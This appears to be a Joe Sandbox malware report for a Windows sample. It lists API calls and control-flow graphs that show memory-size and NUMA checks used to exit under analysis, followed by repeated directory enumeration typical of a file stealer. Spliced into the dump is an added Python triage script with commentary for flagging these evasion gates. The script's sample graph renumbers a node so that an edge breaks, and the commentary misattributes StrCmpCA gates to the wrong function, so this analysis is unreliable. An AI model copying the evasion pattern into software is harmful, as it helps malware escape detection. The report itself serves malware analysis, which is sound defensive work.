                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 0013F11F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 1a671beaa489e6b2329ad1121a2bac44076e53fc7a00d1358845f0130fbc516b
                            • Instruction ID: e7562c7c469381e44ea93729390045d09e4f5dd7c54c2350d57fbbb974bb541b
                            • Opcode Fuzzy Hash: 1a671beaa489e6b2329ad1121a2bac44076e53fc7a00d1358845f0130fbc516b
                            • Instruction Fuzzy Hash: 5E214670A20226ABCB25FF78FC4769E37A4AF25305F005528F84ADBA56DB30D8658790

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 138dca-138e14 StrCmpCA 2888 138e16-138e17 ExitProcess 2886->2888 2889 138e1d-138e36 2886->2889 2891 139032-13903f call 122a20 2889->2891 2892 138e3c-138e41 2889->2892 2893 138e46-138e49 2892->2893 2895 139013-13902c 2893->2895 2896 138e4f 2893->2896 2895->2891 2936 138e43 2895->2936 2898 138e56-138e65 lstrlen 2896->2898 2899 138ed4-138ee2 StrCmpCA 2896->2899 2900 138ef4-138f08 StrCmpCA 2896->2900 2901 138fd8-138fea lstrlen 2896->2901 2902 138fbf-138fcd StrCmpCA 2896->2902 2903 138e80-138e8f lstrlen 2896->2903 2904 138fa6-138fb4 StrCmpCA 2896->2904 2905 138eaa-138eb9 lstrlen 2896->2905 2906 138f0d-138f1b StrCmpCA 2896->2906 2907 138f2d-138f3b StrCmpCA 2896->2907 2908 138f4d-138f5b StrCmpCA 2896->2908 2909 138f6d-138f7b StrCmpCA 2896->2909 2910 138f8d-138f9b StrCmpCA 2896->2910 2915 138e67-138e6c call 122a20 2898->2915 2916 138e6f-138e7b call 122930 2898->2916 2899->2895 2927 138ee8-138eef 2899->2927 2900->2895 2920 138ff4-139000 call 122930 2901->2920 2921 138fec-138ff1 call 122a20 2901->2921 2902->2895 2919 138fcf-138fd6 2902->2919 2922 138e91-138e96 call 122a20 2903->2922 2923 138e99-138ea5 call 122930 2903->2923 2904->2895 2918 138fb6-138fbd 2904->2918 2924 138ec3-138ecf call 122930 2905->2924 2925 138ebb-138ec0 call 122a20 2905->2925 2906->2895 2911 138f21-138f28 2906->2911 2907->2895 2912 138f41-138f48 2907->2912 2908->2895 2913 138f61-138f68 2908->2913 2909->2895 2914 138f81-138f88 2909->2914 2910->2895 2917 138f9d-138fa4 2910->2917 2911->2895 2912->2895 2913->2895 2914->2895 2915->2916 2945 139003-139005 2916->2945 2917->2895 2918->2895 2919->2895 2920->2945 2921->2920 2922->2923 2923->2945 2924->2945 2925->2924 2927->2895 2936->2893 2945->2895 2946 139007-139009 2945->2946 2946->2895 2947 13900b-13900d lstrcpy 2946->2947 2947->2895
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 35c8a6f0b76b6f60f3d2dc8c280533c5e10cf0f8c2554a9b10c645bc78704f8c
                            • Instruction ID: f88a1d82f60bbbb8780c213b6ef49dcd651738dac66843b7bf5bfb19d18d9ce2
                            • Opcode Fuzzy Hash: 35c8a6f0b76b6f60f3d2dc8c280533c5e10cf0f8c2554a9b10c645bc78704f8c
                            • Instruction Fuzzy Hash: 8AE09270104345EFCB019BB4CC98D4A7B6CEF05305F4008A9E8054F1A6D73094148765

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2948 1210c0-1210cb 2949 1210d0-1210dc 2948->2949 2951 1210de-1210f3 GlobalMemoryStatusEx 2949->2951 2952 121112-121114 ExitProcess 2951->2952 2953 1210f5-121106 2951->2953 2954 12111a-12111d 2953->2954 2955 121108 2953->2955 2955->2952 2956 12110a-121110 2955->2956 2956->2952 2956->2954
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: cba39bf094438caa7a97ed67755650414dc4a5628c3164e5bbab358598cf85a6
                            • Instruction ID: 46216e4f667269f37b51982e639554ea27782da302a2bc38a71daa14af9369e6
                            • Opcode Fuzzy Hash: cba39bf094438caa7a97ed67755650414dc4a5628c3164e5bbab358598cf85a6
                            • Instruction Fuzzy Hash: ABF027701082A4ABEB14EA74FC1A72DF7D8EB20351F600929EE9AC21D0E330C870953B
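                            The two functions above (VirtualAllocExNuma plus a 0x17C841C0-byte VirtualAlloc at 0x121030, GlobalMemoryStatusEx at 0x1210c0) share one shape: an environment probe whose result decides between continuing and ExitProcess. The script below is an added triage example, not Joe Sandbox code and not the sample's code. It parses the report's own "APIs" bullet lines and "control_flow_graph" line (both copied from this page as constructed input) and reports blocks that branch directly into an ExitProcess block, plus VirtualAlloc calls above a size threshold. The probe-API list and the 256 MiB threshold are assumptions for this sample, not Joe Sandbox heuristics. One reading caveat the parser deliberately leaves alone: the five values the report attaches to GetCurrentProcess are the stack contents at that call site, and they line up with VirtualAllocExNuma's own parameters (lpAddress 0, dwSize 0x7D0, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, nndPreferred 0) pushed before the handle was fetched; the "(00000000)" shown for VirtualAllocExNuma itself is only the handle slot.

```python
"""Triage helper for Joe Sandbox per-function listings (added example, not Joe Sandbox's or the
sample's code). It parses the "APIs" bullet lines and the "control_flow_graph" line the report
prints for each function, flags blocks that branch straight into an ExitProcess block, and flags
VirtualAlloc calls large enough to fail on a memory-capped analysis VM."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample input, copied from the report's listing of the function at 0x121030.
SAMPLE_API_LINES = """\
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
• VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
• ExitProcess.KERNEL32 ref: 00121058
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0012106C
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 001210AB
"""
SAMPLE_CFG_NUMA = ("control_flow_graph 2798 121030-121055 GetCurrentProcess VirtualAllocExNuma 2799 121057-121058 ExitProcess "
                   "2798->2799 2800 12105e-12107b VirtualAlloc 2798->2800 2801 121082-121088 2800->2801 2802 12107d-121080 "
                   "2800->2802 2803 1210b1-1210b6 2801->2803 2804 12108a-1210ab VirtualFree 2801->2804 2802->2801 2804->2803")
# Second constructed sample: the GlobalMemoryStatusEx function at 0x1210c0 from the same report.
SAMPLE_CFG_MEM = ("control_flow_graph 2957 1210c0-1210cb 2949 1210d0-1210dc 2948->2949 2951 1210de-1210f3 GlobalMemoryStatusEx "
                  "2949->2951 2952 121112-121114 ExitProcess 2951->2952 2953 1210f5-121106 2951->2953 2954 12111a-12111d "
                  "2953->2954 2955 121108 2953->2955 2955->2952 2956 12110a-121110 2955->2956 2956->2952 2956->2954")

# Assumptions: the APIs this sample gates on, and the size above which a VirtualAlloc reads as a RAM
# probe rather than a working buffer (the call at 0x12106c asks for 0x17C841C0 bytes, about 380 MiB).
ENV_PROBE_APIS = {"VirtualAllocExNuma", "GlobalMemoryStatusEx"}
LARGE_ALLOC_BYTES = 256 * 1024 * 1024

API_LINE = re.compile(r"^\s*(?:•\s*)?(?P<api>[^.\s(]+)\.(?P<module>\w+)"
                      r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
RANGE = re.compile(r"^([0-9A-Fa-f]+)(?:-([0-9A-Fa-f]+))?$")   # "121030-121055" or a bare "121108"

@dataclass
class ApiCall:
    api: str
    args: list[str]   # stack values as the plugin recorded them, "?" when unknown
    ref: int          # address recorded for the call site

@dataclass
class Block:
    node: int
    start: int
    end: int
    labels: list[str] = field(default_factory=list)   # API names and "call <addr>" tokens

def parse_api_lines(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m.group("api"), args, int(m.group("ref"), 16)))
    return calls

def parse_cfg_line(line: str) -> tuple[dict[int, Block], list[tuple[int, int]]]:
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    edges = [(int(m.group(1)), int(m.group(2))) for t in tokens for m in [EDGE.match(t)] if m]
    node_ids = {n for e in edges for n in e}
    blocks: dict[int, Block] = {}
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = RANGE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
        # A node is "<id> <start>-<end>"; a bare "<id> <addr>" only counts when the id occurs in an
        # edge, so the target in "call 122930 2808 13f097-13f09f" stays a label rather than a node.
        if EDGE.match(tok):
            pass
        elif tok.isdigit() and nxt and (nxt.group(2) is not None or int(tok) in node_ids):
            start = int(nxt.group(1), 16)
            current = Block(int(tok), start, int(nxt.group(2), 16) if nxt.group(2) else start)
            blocks[current.node] = current
            i += 1
        elif current is not None:
            current.labels.append(tok)
        i += 1
    return blocks, edges

def exit_gates(blocks: dict[int, Block], edges: list[tuple[int, int]]) -> list[tuple[Block, Block]]:
    """(source, exit) pairs: a block that calls something and whose successor calls ExitProcess."""
    return [(blocks[a], blocks[b]) for a, b in edges
            if a in blocks and b in blocks and blocks[a].labels and "ExitProcess" in blocks[b].labels]

def large_allocations(calls: list[ApiCall], threshold: int = LARGE_ALLOC_BYTES) -> list[tuple[ApiCall, int]]:
    """VirtualAlloc calls whose dwSize (second recorded argument) is at least `threshold` bytes."""
    return [(c, int(c.args[1], 16)) for c in calls if c.api == "VirtualAlloc" and len(c.args) >= 2
            and re.fullmatch(r"[0-9A-Fa-f]+", c.args[1]) and int(c.args[1], 16) >= threshold]

def triage(api_text: str, cfg_line: str) -> list[str]:
    calls, (blocks, edges) = parse_api_lines(api_text), parse_cfg_line(cfg_line)
    findings = [f"{'environment probe' if set(s.labels) & ENV_PROBE_APIS else 'exit gate'}: "
                f"{' '.join(s.labels)} @ {s.start:08x}-{s.end:08x} -> ExitProcess @ {d.start:08x}"
                for s, d in exit_gates(blocks, edges)]
    findings += [f"large VirtualAlloc: 0x{size:x} bytes ({size >> 20} MiB) @ ref {c.ref:08x}"
                 for c, size in large_allocations(calls)]
    return findings
```

                            Run against the 0x121030 listing it reports the VirtualAllocExNuma block as an environment probe feeding ExitProcess and the 0x17C841C0-byte VirtualAlloc as a large allocation; against the 0x1210c0 graph it reports the GlobalMemoryStatusEx block. Blocks with no recorded API (the two empty blocks at 0x121108 and 0x12110a that also lead to ExitProcess) are ignored, so the same function's StrCmpCA gates on "block" and "ERROR" show up as plain "exit gate" findings only when their block carries the API name.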

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2957 142ca0-142cf2 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 142d14-142d29 2957->2958 2959 142cf4-142d06 2957->2959
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00142CCF
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142CD6
                            • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00142CEA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateComputerNameProcess
                            • String ID:
                            • API String ID: 1664310425-0
                            • Opcode ID: 6e5880010848956a4d66f74e3c944d3f9119c05408b025a969d3c770c6bc5240
                            • Instruction ID: 4f682523e097cac0a705c1c0815674b0e2dee9f31d645c68ba9dc949f206629d
                            • Opcode Fuzzy Hash: 6e5880010848956a4d66f74e3c944d3f9119c05408b025a969d3c770c6bc5240
                            • Instruction Fuzzy Hash: 2D01D172A44248EBD710CF99ED45BAAF7BCFB44B22F10026BFE19E3790D774590486A1
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00121046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 0012104D
                            • ExitProcess.KERNEL32 ref: 00121058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0012106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 001210AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: ddd72d96490f19ae7643bee3b2134200aeab6f94e92847442e5720deec39060c
                            • Instruction ID: 2b29fb05ac99c9b3efb5e4390627b7343fd63c90f1d5458de98214b5c4996a9a
                            • Opcode Fuzzy Hash: ddd72d96490f19ae7643bee3b2134200aeab6f94e92847442e5720deec39060c
                            • Instruction Fuzzy Hash: DAE0C2B02883C0BBE62207A26C5EF123F2C9B02B06F014445F340EB0E2D695B400DA38
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00132524
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132547
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00132552
                            • lstrlen.KERNEL32(\*.*), ref: 0013255D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013257A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00132586
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001325BA
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 001325D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 051cdaf315fc359072aa1b80e584c98a2a63fa6360d6282ae065a3d0b4dcbfbb
                            • Instruction ID: 28b94439c4491807f875e41f7822fdce3674754638db113fe3a2306e12345ff8
                            • Opcode Fuzzy Hash: 051cdaf315fc359072aa1b80e584c98a2a63fa6360d6282ae065a3d0b4dcbfbb
                            • Instruction Fuzzy Hash: D8A2B031A01736EBCB22AF74EC89BAE77B9AF18701F044529F815E7261DB34DD458B90
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001216E2
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012176C
                            • lstrcat.KERNEL32(00000000), ref: 00121776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001217A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001217EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001217F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121875
                            • lstrcat.KERNEL32(00000000), ref: 0012187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001218AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 001218F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001218FE
                            • lstrlen.KERNEL32(0015179C), ref: 00121909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121929
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121966
                            • lstrlen.KERNEL32(\*.*), ref: 00121971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 0012199A
                              • Part of subcall function 00144250: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0014427D
                              • Part of subcall function 00144250: lstrcpy.KERNEL32(00000000,?), ref: 001442B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001219C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121A16
                            • lstrlen.KERNEL32(0015179C), ref: 00121A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121A41
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121A81
                            • lstrlen.KERNEL32(0015179C), ref: 00121A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121AAC
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00121B45
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 00121B70
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 00121B8A
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121C03
                            • lstrlen.KERNEL32(0015179C), ref: 00121C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121C31
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121C74
                            • lstrlen.KERNEL32(0015179C), ref: 00121C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121CA2
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121CAE
                            • lstrlen.KERNEL32(?), ref: 00121CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00121CE9
                            • lstrlen.KERNEL32(0015179C), ref: 00121CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121D14
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121DEB
                            • lstrlen.KERNEL32(0015179C), ref: 00121DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121E19
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00121E56
                            • lstrlen.KERNEL32(0015179C), ref: 00121E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121E81
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00121E8D
                            • lstrlen.KERNEL32(?), ref: 00121E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00121EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00121F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00121F45
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121F9F
                            • lstrlen.KERNEL32(013F8FF8), ref: 00121FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00121FE3
                            • lstrlen.KERNEL32(0015179C), ref: 00121FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012200E
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 0012201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00122042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012204D
                            • lstrlen.KERNEL32(0015179C), ref: 00122058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122075
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00122081
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: e949b4e775fb3dcc9fbe03fdfa5ebcf491b44995c9e154cebc922ef55e65f08e
                            • Instruction ID: c6b66c52c388126c6a089beab822ad39df3844e58c20b7ca00458a58654de5c6
                            • Opcode Fuzzy Hash: e949b4e775fb3dcc9fbe03fdfa5ebcf491b44995c9e154cebc922ef55e65f08e
                            • Instruction Fuzzy Hash: CD92913190163AFBCB22EF64EC89BAE77B9AF24705F040125F805A7265DB34DD55CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00131A22
                            • lstrlen.KERNEL32(\*.*), ref: 00131A2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131A4F
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00131A5B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131A82
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00131A97
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 00131AB7
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 00131AD1
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00131B0F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00131B42
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131B6A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131B75
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131B9C
                            • lstrlen.KERNEL32(0015179C), ref: 00131BAE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131BD0
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131BDC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131C04
                            • lstrlen.KERNEL32(?), ref: 00131C18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131C35
                            • lstrcat.KERNEL32(00000000,?), ref: 00131C43
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131C69
                            • lstrlen.KERNEL32(013F9058), ref: 00131C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131CA9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131CB4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131CDF
                            • lstrlen.KERNEL32(0015179C), ref: 00131CF1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131D13
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131D1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131D48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131D75
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131D80
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131DA7
                            • lstrlen.KERNEL32(0015179C), ref: 00131DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131DDB
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131DE7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131E10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131E3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131E4A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131E71
                            • lstrlen.KERNEL32(0015179C), ref: 00131E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131EA5
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131EB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131EDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131F09
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131F14
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131F3D
                            • lstrlen.KERNEL32(0015179C), ref: 00131F69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131F86
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131F92
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131FB8
                            • lstrlen.KERNEL32(013FD3A0), ref: 00131FCE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132002
                            • lstrlen.KERNEL32(0015179C), ref: 00132016
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132033
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 0013203F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132065
                            • lstrlen.KERNEL32(013FD9F8), ref: 0013207B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001320AF
                            • lstrlen.KERNEL32(0015179C), ref: 001320C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001320E0
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 001320EC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132112
                            • lstrlen.KERNEL32(013EBA08), ref: 00132128
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132150
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013215B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132186
                            • lstrlen.KERNEL32(0015179C), ref: 00132198
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001321B7
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 001321C3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001321E8
                            • lstrlen.KERNEL32(?), ref: 001321FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132220
                            • lstrcat.KERNEL32(00000000,?), ref: 0013222E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00132253
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013228F
                            • lstrlen.KERNEL32(013FD448), ref: 0013229E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001322C6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001322D1
                            Strings
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: 8564b0b6874422f512ea87584fa967ae5b0498230883abbfa8cea784ba61a8af
                            • Instruction ID: 22e9a4ddd07a06c3d1995ea41727f92ec6903b253057cf3f5dbd139ac26d02ee
                            • Opcode Fuzzy Hash: 8564b0b6874422f512ea87584fa967ae5b0498230883abbfa8cea784ba61a8af
                            • Instruction Fuzzy Hash: 0362BD30911636ABCB22EF64EC89BAFB7BDAF59701F040525F805A7265DB34DD05CBA0
                            APIs
                            • wsprintfA.USER32 ref: 00133A8C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00133AA3
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 00133ACC
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 00133AE6
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00133B1F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00133B47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133B52
                            • lstrlen.KERNEL32(0015179C), ref: 00133B5D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133B7A
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133B86
                            • lstrlen.KERNEL32(?), ref: 00133B93
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133BB3
                            • lstrcat.KERNEL32(00000000,?), ref: 00133BC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133BEA
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00133C2E
                            • lstrlen.KERNEL32(?), ref: 00133C38
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133C65
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133C70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133C96
                            • lstrlen.KERNEL32(0015179C), ref: 00133CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133CCA
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133CD6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133CFE
                            • lstrlen.KERNEL32(?), ref: 00133D12
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133D32
                            • lstrcat.KERNEL32(00000000,?), ref: 00133D40
